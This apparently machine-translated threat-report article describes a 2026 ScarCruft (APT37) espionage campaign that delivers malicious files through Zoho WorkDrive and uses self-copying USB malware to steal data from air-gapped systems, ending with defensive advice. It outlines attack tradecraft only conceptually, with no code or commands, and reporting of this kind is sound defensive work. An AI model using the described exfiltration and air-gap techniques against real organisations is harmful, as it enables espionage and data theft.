ScarCruft exploits Zoho WorkDrive and USB malware for air-gap attacks

Introduction: A new advanced campaign by the ScarCruft group

The North Korean APT group known as scarcruft, or APT37, launched one of the most complex and well-orchestrated cyber campaigns observed to date in 2026. Using a combination of platform exploitation Zoho WorkDrive and attacks with malware on USB Specifically designed to infect air-gap systems, the threat actors have once again demonstrated the high level of expertise and perseverance in their digital espionage operations.
This offensive is notable for the sophisticated way it attacks different segments of the digital chain, compromising both internet-connected environments and physically isolated infrastructures. The main goal is to collect sensitive information, including strategic documents, project files, internal communications and critical operational data of the targeted victims.

Initial infection mechanism via Zoho WorkDrive

ScarCruft abused the ecosystem Zoho WorkDrive to deliver malicious files that are disguised as legitimate documents. Using advanced social engineering techniques, attackers send links to files uploaded to WorkDrive, exploiting companies' trust in this collaborative platform. Victims interact with the documents without suspecting that they contain malicious macros, PowerShell scripts or zero-day exploits capable of initiating the installation of an entire malware infrastructure.
This method allows for efficient distribution and is difficult to detect, as traffic to WorkDrive is often considered benign by security solutions. The attack is a perfect example of how service providers cloud can be exploited to bypass traditional defense mechanisms.

Secondary vector: infection of air-gap systems via USB

One of the most impressive components of the ScarCruft campaign is the use of a multi-stage USB malware, specifically designed to compromise air-gap systems, that is, those systems completely isolated from any internet connection. Attackers place a dedicated module in the advanced stages of compromise capable of automatically copying itself onto USB sticks connected to the infected systems.
Once the stick is inserted into a computer in an air-gap environment, the malware silently activates, collects files of interest, and saves them to a hidden location. Later, when the USB device is reconnected to a compromised system connected to the internet, the data is automatically exfiltrated to command and control servers. This technique allows attackers to bypass one of the strongest physical security measures used by organizations.

Technical framework: malware components used

Kaspersky and MSTIC analysis showed that ScarCruft uses a modular ecosystem malware, tailored for each stage of the attack. Among the identified components are:
an initial dropper based on obfuscated PowerShell scripts; a keylogger with extensive telemetry and clipboard monitoring functionality; a stealth module for exfiltrating data through legitimate channels; a polymorphic USB malware capable of self-modifying itself to evade detection; persistence scripts integrated into the Task Scheduler and registry. This modular framework allows attackers to install only the necessary components, thus reducing the risk of detection and maintaining a discreet profile in the victim's network. Each module is cryptographically signed or masked under legitimate identities, making forensic analysis difficult.

Zoho WorkDrive Exploitation: A Stealthy Infiltration Model

Regarding infiltration through Zoho WorkDrive, ScarCruft uploads files with dual behavior: on the outside they appear to be unimportant documents, but inside they hide coded sequences that activate the download of a secondary payload. The traffic is placed in the infrastructure cloud of a company with a strong reputation, security solutions allow the transition of these files without alerting.
In addition to this technique, attackers also use mechanisms encoded command chaining, which allows them to run PowerShell commands directly from WorkDrive files without raising suspicion. The result is a high level of persistence, combined with operational latency that makes the campaign difficult to identify until it has already compromised critical segments of the victim's infrastructure.

The geopolitical and rational objectives of the ScarCruft group

ScarCruft is known for its focus on geopolitical espionage, with a particular interest in industries such as defense, advanced research, nuclear energy, telecommunications, and government institutions. In the current campaign, stated targets include organizations in Southeast Asia, Central Europe, Australia, and the United States.
The group focuses on acquiring strategic information that can support the interests of the North Korean state, either in diplomatic negotiations or in the development of its domestic programs. By combining compromise cloud with advanced air-gap infiltration techniques, ScarCruft demonstrates a rare technical maturity, rather characteristic of state actors with vast resources.

Details on how to exfiltrate data

One of the most innovative parts of this campaign is how the information is exfiltrated. Instead of using obscure channels or custom C2 infrastructures, ScarCruft relies on:
proxy servers hosted in third countries; encrypted channels integrated into services cloud legitimate; incremental file transfer to reduce visibility; fragmenting data to send it in small segments. This strategy significantly reduces the chance that an anomaly-based detection system will notice unusual activity. Attackers also implement self-destruct mechanisms for components left behind after exfiltration, eliminating traces that could help forensic analysts.

Infection scenario for air-gap systems

A typical scenario presented by researchers looks like this: an employee downloads a compromised document

is on a system connected to the internet. Unbeknownst to them, it installs a stealth agent that monitors USB connections. When the employee inserts a USB stick that is also used in the air-gap environment, the agent automatically copies the malware onto the device, in a hidden and obfuscated section.
When the stick is moved into an air-gapped system, the payload activates, scans the entire machine for sensitive documents and stores them in an encrypted container. Upon reinsertion into a compromised system connected to the internet, the data is silently exfiltrated.

The reasons why the attack is so effective

The effectiveness of this campaign comes from three key elements:
Exploiting trust in services cloud legitimate ones like Zoho. The ability to compromise air-gap systems, traditionally considered very secure. The modularity of the malware, adaptable to any type of infrastructure. These elements make ScarCruft an example of an advanced actor that understands not only the technology, but also the organizational and human behavior of its victims.

Recommended measures for organizations

Specialists recommend a series of essential measures to prevent such attacks:
Rigorous analysis of files uploaded to platforms cloud, including those from trusted sources. Restrictions and advanced monitoring for the use of USB devices. Strong network segmentation and active isolation of sensitive systems. Implementation of EDR and XDR solutions with behavioral analysis capabilities. Advanced training for employees on social engineering attacks. Adopting these measures can substantially reduce the risk of a ScarCruft attack succeeding, but the reality remains that APT actors will constantly adapt their techniques to overcome defensive mechanisms.

Conclusion

The 2026 ScarCruft campaign marks a significant evolution in APT techniques geared towards geopolitical espionage. The Zoho WorkDrive platform exploitation combined with the ability to compromise air-gap systems via USB malware represents a quantum leap, demonstrating that the traditional boundaries between connected and isolated environments are no longer a real barrier for well-prepared actors.
As organizations continue to rely on ecosystems cloud and on mixed infrastructures, these types of campaigns are likely to become more common. Rigorous assessment of the digital chain, increased cyber maturity, and investments in adaptive security are becoming imperative to prevent such critical incidents.

You have certainly understood what is new in cybersecurity in 2026. If you are interested in deepening your knowledge in the field, we invite you to explore our range of courses structured by roles and categories in CYBERSECURITY HUBWhether you're just starting out or want to brush up on your skills, we have a course for you.